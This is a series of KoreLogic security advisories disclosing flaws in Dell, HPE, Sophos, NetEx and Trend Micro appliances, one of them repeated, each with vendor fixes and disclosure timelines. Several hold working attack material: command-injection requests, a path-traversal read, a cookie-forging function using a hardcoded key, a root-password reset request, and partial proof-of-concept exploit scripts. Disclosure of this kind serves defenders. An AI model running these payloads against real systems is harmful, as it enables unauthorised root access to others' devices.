KL-001-2018-009 : Dell OpenManage Network Manager Multiple Vulnerabilities
KL-001-2018-009 : Dell OpenManage Network Manager Multiple Vulnerabilities Title: Dell OpenManage Network Manager Multiple Vulnerabilities Advisory ID: KL-001-2018-009 Publication Date: 2018.11.05 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-009.txt 1. Vulnerability Details Affected Vendor: Dell Affected Product: OpenManage Network Manager Affected Version: 6.2.0.51 SP3 Platform: Embedded Linux CWE Classification: CWE-285: Improper Authorization, CWE-284: Improper Access Control Impact: Privilege Escalation Attack vector: MySQL, HTTP CVE ID: CVE-2018-15767, CVE-2018-15768 2. Vulnerability Description Dell OpenManage Network Manager exposes a MySQL listener that can be accessed with default credentials (CVE-2018-15768). This MySQL service is running as the root user, so an attacker can exploit this configuration to, e.g., deploy a backdoor and escalate privileges into the root account (CVE-2018-15767). 3. Technical Description The appliance binds on 3306/mysql using the 0.0.0.0 IP address. The default IPTables policy is ACCEPT and the rule table is empty. Using any of three default accounts, a malicious user can exploit native MySQL functionality to place a JSP shell into the directory of a web server on the file system and subsequently make calls into it. 4. Mitigation and Remediation Recommendation The vendor informed KoreLogic that all default passwords can be changed and are documented in the OpenManage Network Manager Installation Guide. Dell recommends all customers change these default passwords upon installation. The vendor has addressed these vulnerabilities in version 6.5.3. Release notes and download instructions can be found at: https://www.dell.com/support/home/us/en/04/drivers/driversdetails?driverId=5XC0J 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2018.02.16 - KoreLogic submits vulnerability details to Dell. 2018.02.16 - Dell acknowledges receipt. 2018.04.02 - Dell informs KoreLogic that a rememdiation plan is in place and requests approximately two months continued embargo on the vulnerability details. 2018.04.23 - 45 business days have elapsed since the vulnerability was reported to Dell. 2018.05.14 - 60 business days have elapsed since the vulnerability was reported to Dell. 2018.06.05 - 75 business days have elapsed since the vulnerability was reported to Dell. 2018.06.11 - Dell informs KoreLogic that the patched version has been released and asks that the KoreLogic advisory remain unpublished until 2018.06.22. 2018.06.21 - Dell requests additional time to coordinate changes to the MySQL implementation, noting that this driver is provided by and upstream vendor. 2018.07.11 - 100 business days have elapsed since the vulnerability was reported to Dell. 2018.07.16 - Dell informs KoreLogic that the remediations are targeted for version 6.5.3, slated for a September release. 2018.08.08 - 120 business days have elapsed since the vulnerability was reported to Dell. 2018.09.20 - 150 business days have elapsed since the vulnerability was reported to Dell. 2018.10.03 - Dell informs KoreLogic that version 6.5.3 is scheduled to be released 2018.10.08. 2018.10.11 - Dell and KoreLogic begin mutual review of disclosure statements. 2018.11.02 - Dell issues public advisory- https://www.dell.com/support/article/us/en/19/sln314610; 180 business days have elapsed since the vulnerability was reported to Dell. 2018.11.05 - KoreLogic Disclosure. 7. Proof of Concept #!/usr/bin/python # $ python dell-openmanage-networkmanager_rce.py --host 1.3.3.7 # Dell OpenManage NetworkManager 6.2.0.51 SP3 # SQL backdoor remote root # # [-] Starting attack. # [+] Connected using root account. # [+] Sending malicious SQL. # [+] Dropping shell. # [-] uid=0(root) gid=0(root) groups=0(root) # # # uname -a # Linux synergy.domain.int 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux from optparse import OptionParser from string import ascii_letters, digits from random import choice from re import compile as regex_compile from urllib import urlopen import pymysql.cursors banner = """Dell OpenManage NetworkManager 6.2.0.51 SP3\nSQL backdoor remote root\n""" accounts =
KL-001-2018-008 : HPE VAN SDN Unauthenticated Remote Root Vulnerability
KL-001-2018-008 : HPE VAN SDN Unauthenticated Remote Root Vulnerability Title: HPE VAN SDN Unauthenticated Remote Root Vulnerability Advisory ID: KL-001-2018-008 Publication Date: 2018.06.25 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2018-008.txt 1. Vulnerability Details Affected Vendor: HP Enterprise Affected Product: VAN SDN Controller Affected Version: 2.7.18.0503 Platform: Embedded Linux CWE Classification: CWE-798: Use of Hard-coded Credentials, CWE-20: Improper Input Validation Impact: Privilege Escalation Attack vector: HTTP 2. Vulnerability Description A hardcoded service token can be used to bypass authentication. Built-in functionality can be exploited to deploy and execute a malicious deb file containing a backdoor. A weak sudoers configuration can then be abused to escalate privileges to root. A second issue can be used to deny use of the appliance by continually rebooting it. 3. Technical Description The exploit will automatically attempt to bypass authentication unless the --no-auth-bypass flag is provided. If that flag is provided, the --username and --password flags must also be given. The options for the --payload flag are: rce-root and pulse-reboot. The default option is rce-root. The pulse-reboot payload will reboot the target device until the attack is stopped. $ python hpevansdn-multiple_exploits.py --help HPE VAN SDN Controller 2.7.18.0503 Unauthenticated Remote Root and Denial-of-Service Usage: hpevansdn-multiple_exploits.py [options] Options: -h, --help show this help message and exit --target=REMOTE_IP Target IP address --no-auth-bypass No authentication bypass --username=USERNAME Username (Default: sdn) --password=PASSWORD Password (Default: skyline) --payload=PAYLOADPayload: rce-root(default), pulse-reboot Below is output for the rce-root payload: $ python hpevansdn-multiple_exploits.py --target 1.3.3.7 HPE VAN SDN Controller 2.7.18.0503 Unauthenticated Remote Root and Denial-of-Service [+] Authentication successfully bypassed. [-] Starting remote root exploit. [-] Building backdoor. [-] Uploading backdoor. [+] Upload successful. [-] Installing backdoor. [+] Starting backdoor on port 49370. [+] Connected to backdoor. * For interactive root shell please run /var/lib/sdn/uploads/root-V6mlQNqW id uid=108(sdnadmin) gid=1000(sdn) groups=1000(sdn) /var/lib/sdn/uploads/root-V6mlQNqW root@medium-hLinux:/opt/sdn/admin# uname -a Linux medium-hLinux 4.4.0-2-amd64-hlinux #hlinux1 SMP Thu Jan 28 12:35:26 UTC 2016 x86_64 GNU/Linux root@medium-hLinux:/opt/sdn/admin# exit [-] Removing backdoor. [+] Backdoor removed. 4. Mitigation and Remediation Recommendation The vendor issued the following statement: HPE had evaluated the impact of service token being leaked and previously updated the security procedure in VAN 2.8.8 Admin Guide page 129. The full guide is here - http://h20628.www2.hp.com/km-ext/kmcsdirect/emr_na-a3662en_us-1.pdf. HPE expects all customers to update their service token, admin token, default sdn user password, and edit iptables as described in the guideline. If the guideline was followed, the exploit would not be successful. 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2018.02.16 - KoreLogic submits vulnerability details to HPE. 2018.02.16 - HPE acknowledges receipt. 2018.04.02 - 30 business days have elapsed since the vulnerability was reported to HPE. 2018.04.23 - 45 business days have elapsed since the vulnerability was reported to HPE. 2018.05.04 - KoreLogic requests an update on the status of the remediation. 2018.05.14 - 60 business days have elapsed since the vulnerability was reported to HPE. 2018.06.05 - 75 business days have elapsed since the vulnerability was reported to HPE. 2018.06.11 - KoreLogic requests an update on the status of the remediation. 2018.06.12 - HPE responds with the statement documented in Section 4. Mitigation and Remediation Recommendation. 2018.06.25 - KoreLogic public disclosure. 7. Proof of Concept from optparse import OptionParser from random import randrange,choice from threading import Thread from os import mkdir,makedirs,system,listdir,remove from string import ascii_letters,digits from subprocess import check_output from requests import get,post from requests.utils import dict_from_cookiejar from requests.exceptions import
KL-001-2018-007 : Sophos UTM 9 loginuser Privilege Escalation via confd Service
KL-001-2018-007 : Sophos UTM 9 loginuser Privilege Escalation via confd Service Title: Sophos UTM 9 loginuser Privilege Escalation via confd Service Advisory ID: KL-001-2018-007 Publication Date: 2018.03.02 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-007.txt 1. Vulnerability Details Affected Vendor: Sophos Affected Product: UTM 9 Affected Version: 9.410 Platform: Embedded Linux CWE Classification: CWE-306: Missing Authentication for Critical Function (SID generation) Impact: Privilege Escalation Attack vector: SSH 2. Vulnerability Description The attacker must know the password for the loginuser account. The confd client is not available to the loginuser account. However, the running service is accessible over a network port on the loopback interface. By replaying the network traffic required to obtain a SID from this service it is possible to escalate privileges to root. 3. Technical Description 1. Obtain the a privileged session token $ ssh -Nf -L 127.0.0.1:4472:127.0.0.1:4472 loginuser@1.3.3.7 loginuser@1.3.3.7's password: $ python kl-loginuser-confd-priv_esc.py pojiZSqWEUAUDNIQtSop 2. Using that session token, set the root password POST /webadmin.plx HTTP/1.1 Host: 1.3.3.7: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.5.1.1 Content-Type: application/json; charset=UTF-8 Referer: https://1.3.3.7:/ Content-Length: 422 Cookie: SID=pojiZSqWEUAUDNIQtSop DNT: 1 Connection: close {"objs": [{"ack": null, "elements": {"root_pw_1": "korelogic", "root_pw_2": "korelogic", "loginuser_pw_1": "loginuser", "loginuser_pw_2": "loginuser"}, "FID": "system_settings_shell"}], "SID": "pojiZSqWEUAUDNIQtSop", "browser": "gecko", "backend_version": "2", "loc": "english", "_cookie": null, "wdebug": 0, "RID": "1490305723111_0.8089407793028881", "current_uuid": "2844879a-e014-11da-b3ae-0014221e9eba", "ipv6": false} HTTP/1.1 200 OK Date: Thu, 23 Mar 2017 15:33:53 GMT Server: Apache Expires: Thursday, 01-Jan-1970 00:00:01 GMT Pragma: no-cache X-Frame-Options: SAMEORIGIN X-Content-Type-Option: nosniff X-XSS-Protection: 1; mode=block Vary: Accept-Encoding Connection: close Content-Type: application/json; charset=utf-8 Content-Length: 178895 {"SID":"pojiZSqWEUAUDNIQtSop","ipv6":false,"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba",[snip over 9000] 3. Look for success message. "objs":[{"success":[{"text":"Shell user password(s) set successfully."}] 4. Profit. loginuser@[redacted]:/home/login > su Password: [redacted]:/home/login # id uid=0(root) gid=0(root) groups=0(root),890(xorp) 4. Mitigation and Remediation Recommendation The vendor has addressed this vulnerability in version 9.508. Release notes and download instructions can be found at: https://community.sophos.com/products/unified-threat-management/b/utm-blog/posts/utm-up2date-9-508-released 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2017.07.21 - KoreLogic submits vulnerability details to Sophos. 2017.07.21 - Sophos acknowledges receipt. 2017.09.01 - 30 business days have elapsed since the vulnerability was reported to Sophos. 2017.09.15 - KoreLogic requests an update on the status of this and other vulnerabilities reported to Sophos. 2017.09.18 - Sophos informs KoreLogic that this issue will require additional engineering and requests an extension of the disclosure timeline. 2017.09.25 - 45 business days have elapsed since the vulnerability was reported to Sophos. 2017.11.07 - 75 business days have elapsed since the vulnerability was reported to Sophos. 2017.12.14 - 100 business days have elapsed since the vulnerability was reported to Sophos. 2018.01.12 - KoreLogic requests an update from Sophos. 2018.01.15 - Sophos informs KoreLogic that the expected release date for the UTM 9.5 MR 6 version containing the mitigation is the middle of February. 2018.01.16 - 120 business days have elapsed since the vulnerability was reported to Sophos. 2018.02.28 - 150 business days have elapsed since the vulnerability was reported to Sophos. 2018.03.01 - UTM 9.508 released by Sophos. 2018.03.02 - KoreLogic public disclosure. 7. Proof of Concept from socket import socket,AF_INET,SOCK_STREAM
KL-001-2018-007 : Sophos UTM 9 loginuser Privilege Escalation via confd Service
KL-001-2018-007 : Sophos UTM 9 loginuser Privilege Escalation via confd Service Title: Sophos UTM 9 loginuser Privilege Escalation via confd Service Advisory ID: KL-001-2018-007 Publication Date: 2018.03.02 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-007.txt 1. Vulnerability Details Affected Vendor: Sophos Affected Product: UTM 9 Affected Version: 9.410 Platform: Embedded Linux CWE Classification: CWE-306: Missing Authentication for Critical Function (SID generation) Impact: Privilege Escalation Attack vector: SSH 2. Vulnerability Description The attacker must know the password for the loginuser account. The confd client is not available to the loginuser account. However, the running service is accessible over a network port on the loopback interface. By replaying the network traffic required to obtain a SID from this service it is possible to escalate privileges to root. 3. Technical Description 1. Obtain the a privileged session token $ ssh -Nf -L 127.0.0.1:4472:127.0.0.1:4472 loginuser@1.3.3.7 loginuser@1.3.3.7's password: $ python kl-loginuser-confd-priv_esc.py pojiZSqWEUAUDNIQtSop 2. Using that session token, set the root password POST /webadmin.plx HTTP/1.1 Host: 1.3.3.7: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.5.1.1 Content-Type: application/json; charset=UTF-8 Referer: https://1.3.3.7:/ Content-Length: 422 Cookie: SID=pojiZSqWEUAUDNIQtSop DNT: 1 Connection: close {"objs": [{"ack": null, "elements": {"root_pw_1": "korelogic", "root_pw_2": "korelogic", "loginuser_pw_1": "loginuser", "loginuser_pw_2": "loginuser"}, "FID": "system_settings_shell"}], "SID": "pojiZSqWEUAUDNIQtSop", "browser": "gecko", "backend_version": "2", "loc": "english", "_cookie": null, "wdebug": 0, "RID": "1490305723111_0.8089407793028881", "current_uuid": "2844879a-e014-11da-b3ae-0014221e9eba", "ipv6": false} HTTP/1.1 200 OK Date: Thu, 23 Mar 2017 15:33:53 GMT Server: Apache Expires: Thursday, 01-Jan-1970 00:00:01 GMT Pragma: no-cache X-Frame-Options: SAMEORIGIN X-Content-Type-Option: nosniff X-XSS-Protection: 1; mode=block Vary: Accept-Encoding Connection: close Content-Type: application/json; charset=utf-8 Content-Length: 178895 {"SID":"pojiZSqWEUAUDNIQtSop","ipv6":false,"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba",[snip over 9000] 3. Look for success message. "objs":[{"success":[{"text":"Shell user password(s) set successfully."}] 4. Profit. loginuser@[redacted]:/home/login > su Password: [redacted]:/home/login # id uid=0(root) gid=0(root) groups=0(root),890(xorp) 4. Mitigation and Remediation Recommendation The vendor has addressed this vulnerability in version 9.508. Release notes and download instructions can be found at: https://community.sophos.com/products/unified-threat-management/b/utm-blog/posts/utm-up2date-9-508-released 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2017.07.21 - KoreLogic submits vulnerability details to Sophos. 2017.07.21 - Sophos acknowledges receipt. 2017.09.01 - 30 business days have elapsed since the vulnerability was reported to Sophos. 2017.09.15 - KoreLogic requests an update on the status of this and other vulnerabilities reported to Sophos. 2017.09.18 - Sophos informs KoreLogic that this issue will require additional engineering and requests an extension of the disclosure timeline. 2017.09.25 - 45 business days have elapsed since the vulnerability was reported to Sophos. 2017.11.07 - 75 business days have elapsed since the vulnerability was reported to Sophos. 2017.12.14 - 100 business days have elapsed since the vulnerability was reported to Sophos. 2018.01.12 - KoreLogic requests an update from Sophos. 2018.01.15 - Sophos informs KoreLogic that the expected release date for the UTM 9.5 MR 6 version containing the mitigation is the middle of February. 2018.01.16 - 120 business days have elapsed since the vulnerability was reported to Sophos. 2018.02.28 - 150 business days have elapsed since the vulnerability was reported to Sophos. 2018.03.01 - UTM 9.508 released by Sophos. 2018.03.02 - KoreLogic public disclosure. 7. Proof of Concept from socket import socket,AF_INET,SOCK_STREAM
KL-001-2018-005 : NetEx HyperIP Local File Inclusion Vulnerability
KL-001-2018-005 : NetEx HyperIP Local File Inclusion Vulnerability Title: NetEx HyperIP Local File Inclusion Vulnerability Advisory ID: KL-001-2018-005 Publication Date: 2018.02.08 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-005.txt 1. Vulnerability Details Affected Vendor: NetEx Affected Product: HyperIP Affected Version: 6.1.0 Platform: Embedded Linux CWE Classification: CWE-73: External Control of File Name or Path, CWE-592: Authentication Bypass Issues Impact: Arbitrary Filesystem Reads Attack vector: HTTPS 2. Vulnerability Description Local files can be included within the HTTP response given by logs.php 3. Technical Description Any arbitrary file, such as the one created in KL-001-2018-004, can be returned by the logs.php script. GET /logs.php?system=../../tmp/a.output=Show+System+Log HTTP/1.1 Host: 1.3.3.7 Accept-Language: en-US,en;q=0.5 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 HTTP/1.1 200 OK Date: Mon, 27 Mar 2017 13:07:51 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Content-Length: 502 Connection: close Content-Type: text/html; charset=UTF-8 Show System Log [ Monday @ 08:07:51 ] uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) 4. Mitigation and Remediation Recommendation The vendor has released version 6.1.1 of HyperIP, which they state addresses this vulnerability. 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2017.07.24 - KoreLogic submits vulnerability details to NetEx. 2017.07.24 - NetEx confirms receipt. 2017.08.16 - NetEx informs KoreLogic that this and other reported vulnerabilities have been addressed in the forthcoming release. ETA as of yet undetermined. 2017.09.05 - 30 business days have elapsed since the vulnerability was reported to NetEx. 2017.09.19 - NetEx informs KoreLogic that the forthcoming release 6.1.1 is expected to ship at the end of January 2018. 2017.09.26 - 45 business days have elapsed since the vulnerability was reported to NetEx. 2017.12.01 - 90 business days have elapsed since the vulnerability was reported to NetEx. 2018.01.17 - 120 business days have elapsed since the vulnerability was reported to NetEx. 2018.01.23 - NetEx notifies KoreLogic that the HyperIP 6.1.1 release has gone live. 2018.02.08 - KoreLogic public disclosure. 7. Proof of Concept See 3. Technical Description. The contents of this advisory are copyright(c) 2018 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt signature.asc Description: OpenPGP digital signature
KL-001-2018-004 : NetEx HyperIP Privilege Escalation Vulnerability
KL-001-2018-004 : NetEx HyperIP Privilege Escalation Vulnerability Title: NetEx HyperIP Privilege Escalation Vulnerability Advisory ID: KL-001-2018-004 Publication Date: 2018.02.08 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-004.txt 1. Vulnerability Details Affected Vendor: NetEx Affected Product: HyperIP Affected Version: 6.1.0 Platform: Embedded Linux CWE Classification: CWE-592: Authentication Bypass Issues Impact: Privilege Escalation Attack vector: HTTPS 2. Vulnerability Description Privileges can be escalated by abusing writable paths found within the sudoers configuration file. 3. Technical Description The run script is modified with the attack payload. POST /hypmisc.php HTTP/1.1 Host: 1.3.3.7 Accept-Language: en-US,en;q=0.5 Cookie: auth-token=b6b73844ce4df64f459948c5475a1096 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 90 set_id=msglvl_val=$(echo /usr/bin/id >> /var/ftp/pub/updates/a.run)=on=Set HTTP/1.1 200 OK Date: Mon, 27 Mar 2017 07:21:38 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 1048 Connection: close Content-Type: text/html; charset=UTF-8 The attack payload can now be executed. POST /hypmisc.php HTTP/1.1 Host: 1.3.3.7 Accept-Language: en-US,en;q=0.5 Cookie: auth-token=b6b73844ce4df64f459948c5475a1096 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 91 set_id=msglvl_val=$(sudo /var/ftp/pub/updates/a.run >> /tmp/a.output)=on=Set HTTP/1.1 200 OK Date: Mon, 27 Mar 2017 13:06:55 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 1020 Connection: close Content-Type: text/html; charset=UTF-8 The output can now be read from the a.output file, which is a separate arbitrary file read issue detailed in KL-001-2018-005. GET /logs.php?system=../../tmp/a.output=Show+System+Log HTTP/1.1 Host: 1.3.3.7 Accept-Language: en-US,en;q=0.5 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 HTTP/1.1 200 OK Date: Mon, 27 Mar 2017 13:07:51 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Content-Length: 502 Connection: close Content-Type: text/html; charset=UTF-8 Show System Log [ Monday @ 08:07:51 ] uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) 4. Mitigation and Remediation Recommendation The vendor has released version 6.1.1 of HyperIP, which they state addresses this vulnerability. 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2017.07.24 - KoreLogic submits vulnerability details to NetEx. 2017.07.24 - NetEx confirms receipt. 2017.08.16 - NetEx informs KoreLogic that this and other reported vulnerabilities have been addressed in the forthcoming release. ETA as of yet undetermined. 2017.09.05 - 30 business days have elapsed since the vulnerability was reported to NetEx. 2017.09.19 - NetEx informs KoreLogic that the forthcoming release 6.1.1 is expected to ship at the end of January 2018. 2017.09.26 - 45 business days have elapsed since the vulnerability was reported to NetEx. 2017.12.01 - 90 business days have elapsed since the vulnerability was reported to NetEx. 2018.01.17 - 120 business days have elapsed since the vulnerability was reported to NetEx. 2018.01.23 - NetEx notifies KoreLogic that the HyperIP 6.1.1 release has gone live. 2018.02.08 - KoreLogic public disclosure. 7. Proof of Concept See 3. Technical Description. The contents of this advisory are copyright(c) 2018 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team
KL-001-2018-003 : NetEx HyperIP Post-Auth Command Execution
KL-001-2018-003 : NetEx HyperIP Post-Auth Command Execution Title: NetEx HyperIP Post-Auth Command Execution Advisory ID: KL-001-2018-003 Publication Date: 2018.02.08 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-003.txt 1. Vulnerability Details Affected Vendor: NetEx Affected Product: HyperIP Affected Version: 6.1.0 Platform: Embedded Linux CWE Classification: CWE-78: Improper Neutralization of Special Elements used in an OS Command, CWE-250: Execution with Unnecessary Privileges Impact: Arbitrary Command Execution Attack vector: HTTPS 2. Vulnerability Description A command injection vulnerability can be leveraged to execute operating system commands. 3. Technical Description A POST variable is handled unsafely, allowing execution of arbitrary commands with the privileges of the webserver process. In the below example, set_val= is used to copy an existing executable file into a writable directory. POST /hypmisc.php HTTP/1.1 Host: 1.3.3.7 Accept-Language: en-US,en;q=0.5 Cookie: auth-token=b6b73844ce4df64f459948c5475a1096 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 99 set_id=msglvl_val=$(cp /etc/profile.d/which-2.sh /var/ftp/pub/updates/a.run)=on=Set HTTP/1.1 200 OK Date: Mon, 27 Mar 2017 07:20:56 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 1057 Connection: close Content-Type: text/html; charset=UTF-8 4. Mitigation and Remediation Recommendation The vendor has released version 6.1.1 of HyperIP, which they state addresses this vulnerability. 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2017.07.24 - KoreLogic submits vulnerability details to NetEx. 2017.07.24 - NetEx confirms receipt. 2017.08.16 - NetEx informs KoreLogic that this and other reported vulnerabilities have been addressed in the forthcoming release. ETA as of yet undetermined. 2017.09.05 - 30 business days have elapsed since the vulnerability was reported to NetEx. 2017.09.19 - NetEx informs KoreLogic that the forthcoming release 6.1.1 is expected to ship at the end of January 2018. 2017.09.26 - 45 business days have elapsed since the vulnerability was reported to NetEx. 2017.12.01 - 90 business days have elapsed since the vulnerability was reported to NetEx. 2018.01.17 - 120 business days have elapsed since the vulnerability was reported to NetEx. 2018.01.23 - NetEx notifies KoreLogic that the HyperIP 6.1.1 release has gone live. 2018.02.08 - KoreLogic public disclosure. 7. Proof of Concept See 3. Technical Description. The contents of this advisory are copyright(c) 2018 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt signature.asc Description: OpenPGP digital signature
KL-001-2018-006 : Trend Micro IMSVA Management Portal Authentication Bypass
KL-001-2018-006 : Trend Micro IMSVA Management Portal Authentication Bypass Title: Trend Micro IMSVA Management Portal Authentication Bypass Advisory ID: KL-001-2018-006 Publication Date: 2018.02.08 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-006.txt 1. Vulnerability Details Affected Vendor: Trend Micro Affected Product: InterScan Mail Security Virtual Apppliance Affected Version: 9.1.0.1600 Platform: Embedded Linux CWE Classification: CWE-522: Insufficiently Protected Credentials, CWE-219: Sensitive Data Under Web Root Impact: Authentication Bypass Attack vector: HTTPS 2. Vulnerability Description Any unauthenticated user can bypass the authentication process. 3. Technical Description The web application is plugin-based and allows widgets to be loaded into the application. A plugin which is loaded by default stores a log file of events in a directory which can be accessed by unauthenticated users. Files within this directory (such as /widget/repository/log/diagnostic.log) which contain cookie values can then be read, parsed, and session information extracted. A functional exploit is shown below. 4. Mitigation and Remediation Recommendation Trend Micro has released a Critical Patch update to the affected versions for this vulnerability. The advisory and links to the patch(es) are available from the following URL: https://success.trendmicro.com/solution/1119277 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2017.08.11 - KoreLogic submits vulnerability details to Trend Micro. 2017.08.11 - Trend Micro confirms receipt. 2017.09.15 - KoreLogic asks for an update on the triage of the reported issue. 2017.09.15 - Trend Micro informs KoreLogic that the issue is in remediation but there is no expected release date yet. 2017.09.25 - 30 business days have elapsed since the vulnerability was reported to Trend Micro. 2017.10.06 - Trend Micro informs KoreLogic that the issue will not be addressed before the 45 business-day deadline. They ask for additional time for the details to remain embargoed in order to complete QA on the proposed fix. 2017.10.06 - KoreLogic agrees to extend the disclosure timeline. 2017.10.17 - 45 business days have elapsed since the vulnerability was reported to Trend Micro. 2017.11.02 - Trend Micro notifies KoreLogic that the Critical Patch for IMSVA 9.1 (Critical Patch 1682) has gone live, but they are still working on the patch for IMSVA 9.0. 2017.11.07 - 60 business days have elapsed since the vulnerability was reported to Trend Micro. 2017.12.21 - 90 business days have elapsed since the vulnerability was reported to Trend Micro. 2017.12.28 - Trend Micro notifies KoreLogic that the IMSVA 9.0 Critical Patch is being localized for foreign language customers. Expected release date is late January 2018. 2018.01.18 - Trend Micro notifies KoreLogic that the expected release date for the IMSVA 9.0 Critical Patch and the advisory is to be January 31, 2018. 2018.01.23 - 110 business days have elapsed since the vulnerability was reported to Trend Micro. 2018.01.31 - Trend Micro releases the advisory associated with this vulnerability and the related Critical Patches. 2018.02.08 - KoreLogic public disclosure. 7. Proof of Concept #!/usr/bin/python3 from argparse import ArgumentParser from ssl import _create_unverified_context from time import mktime from urllib.request import HTTPSHandler, HTTPError, Request, urlopen, build_opener banner = '''Trendmicro IMSVA 9.1.0.1600 Management Portal Authentication Bypass {}'''.format('-'*67) class Exploit: def __init__(self, args): self.target_host = args.host self.target_port = args.port self.list_all = args.ls self.sessions = [] self.session_latest_time = None self.session_latest_id = None self.sessions_active = [] return None def is_target(self): url_loginpage = Request('https://{}:{}/loginPage.imss'.format(self.target_host, self.target_port)) url_loginjsp = Request('https://{}:{}/jsp/framework/login.jsp'.format(self.target_host, self.target_port)) if urlopen(url_loginpage, context=_create_unverified_context()).getcode() == 200: try: urlopen(url_loginjsp, context=_create_unverified_context()) except HTTPError as e: if e.code == 403: return True else:
KL-001-2018-002 : NetEx HyperIP Authentication Bypass
KL-001-2018-002 : NetEx HyperIP Authentication Bypass Title: NetEx HyperIP Authentication Bypass Advisory ID: KL-001-2018-002 Publication Date: 2018.02.08 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-002.txt 1. Vulnerability Details Affected Vendor: NetEx Affected Product: HyperIP Affected Version: 6.1.0 Platform: Embedded Linux CWE Classification: CWE-592: Authentication Bypass Issues Impact: Authentication Bypass Attack vector: HTTPS 2. Vulnerability Description Authentication for the management application can be bypassed by recreating the algorithm used to create predictable valid cookies. 3. Technical Description Authentication can be bypassed using the function below. >>> from hashlib import md5 >>> from hmac import new >>> def bypass_auth(user,srcip): ... key = new('$#^Sub/s$',user+srcip,md5).hexdigest() ... token = new(key,user+srcip,md5).hexdigest() ... return token ... The attacker first creates a cookie token. >>> print bypass_auth('hipadmin','[redacted]') b6b73844ce4df64f459948c5475a1096 Then the attacker can submit requests containing that value as the auth-token cookie, which will be trusted by the application. 4. Mitigation and Remediation Recommendation The vendor has released version 6.1.1 of HyperIP, which they state addresses this vulnerability. 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 